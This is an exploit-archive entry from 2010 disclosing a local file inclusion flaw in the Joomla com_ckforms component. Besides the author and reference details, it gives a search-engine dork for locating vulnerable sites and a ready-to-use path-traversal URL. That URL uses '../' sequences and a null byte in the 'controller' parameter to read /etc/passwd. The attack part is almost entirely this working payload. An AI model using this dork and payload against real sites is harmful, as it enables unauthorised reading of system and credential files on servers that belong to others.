Joomla Component (com_ckforms) Local File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Joomla Component (com_ckforms) Local File Inclusion Vulnerability
# Published : 2010-11-08
# Author : altbta
# Previous Title : Joomla Component (com_connect) Local File Inclusion Vulnerability
# Next Title : Joomla ccInvoices Component (com_ccinvoices) SQL Injection Vulnerability

####################################################################
>>>>> Author : altbta [l_9@hotmail.com<mailto:l_9@hotmail.com>]
>>>>> Home : www.v4-team.com/cc<http://www.v4-team.com/cc>
>>>>> Script : Joomla Component com_ckforms
>>>>> Bug Type : Multiple Vulnerabilities
>>>>> Dork : inurl:"com_ckforms"

http://extensions.joomla.org/extensions/contacts-and-feedback/forms/4939
####################################################################

===[ Exploit ]=== [LFI]

http://site/index.php?option=com_ckforms&controller=[LFI]
http://site.com/index.php?option=com_ckforms&controller=../../../.
./../../../../../../etc/passwd%00

####################################################################
RxH & ab0-3th4b